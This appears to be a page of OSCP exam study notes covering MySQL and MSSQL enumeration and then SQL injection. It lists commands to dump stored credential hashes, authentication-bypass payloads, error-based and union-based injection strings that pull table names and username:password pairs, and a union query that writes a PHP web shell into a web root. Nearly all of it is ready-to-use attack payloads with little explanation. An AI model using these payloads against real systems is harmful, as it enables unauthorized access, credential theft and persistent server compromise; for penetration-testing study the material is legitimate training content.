Class Notes

Mysql Interaction And Enumeration

mysql -u root -p'root' -h 192.168.50.16 -P 3306 
 
select version();                   ##show mysql version 
select system_user();               ##show user run by mysql 
show databases;                     ##List all database 
show tables from mysql;             ##show all table inside mysql 
show columns from mysql.user;       ##show all columns inside user table 
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec'; ##Dump creds of 'offsec' user

MSSQL Interaction And Enumeration

impacket-mssqlclient Administrator:[email protected] -windows-auth 
 
-- show version 
SELECT @@version; 
 
-- List all Databases- 
select name from sys.databases; 
 
-- List non-default databases- 
select name from sys.Databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb'); 
 
-- List all the tables from database accounts- 
USE accounts;                       -- Switch to the 'accounts' database 
SELECT table_name FROM INFORMATION_SCHEMA.TABLES;            -- list all tables 
 
-- Dump columns from table users- 
Select column_name from information_schema.columns where table_name='table_name'; 
 
-- Dump the data from the column users- 
select * from users; 
-- Dump specific columns- 
select * from users where name='offsec';

username: $user password: $pass

admin:admin admin' OR 1=1-- //

order by 7

Select username, password from users where username='offsec' union select username, password from users--' AND password='admin';

1=2 OR 1=1 -> True 1=2 OR 1=3 -> False 1=2 AND 1=1 -> False

-- // */

admin' OR 1=1 in (SELECT user())-- // admin' OR 1=1 in (SELECT database())-- // admin' OR 1=1 in (SELECT table_name from information_schema.tables where table_schema='offsec')-- //

admin' OR 1=1 in (SELECT column_name from information_schema.columns where table_schema='offsec' AND table_name='users')-- //

admin' OR 1=1 in (SELECT group_concat(username, ":", password) from users)-- //

###Union

' order by 1-- // ' union select 1,2,3,4,5-- // ' union select 1,2,3,4,5-- // ' union select 1,"abc","abc","abc","abc"-- // ' union select 1,version(),database(),user(),"abc"-- // ' union select 1,table_name,database(),user(),"abc" from information_schema.tables where table_schema='offsec'-- //

' union select 1,column_name,database(),user(),"abc" from information_schema.columns where table_schema='offsec' AND table_name='users'-- //

' union select 1,username,password,user(),"abc" from users-- //

' union select "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

PreviousOSCP-GUIDE-LatestNextExam Tips

Last updated

Was this helpful?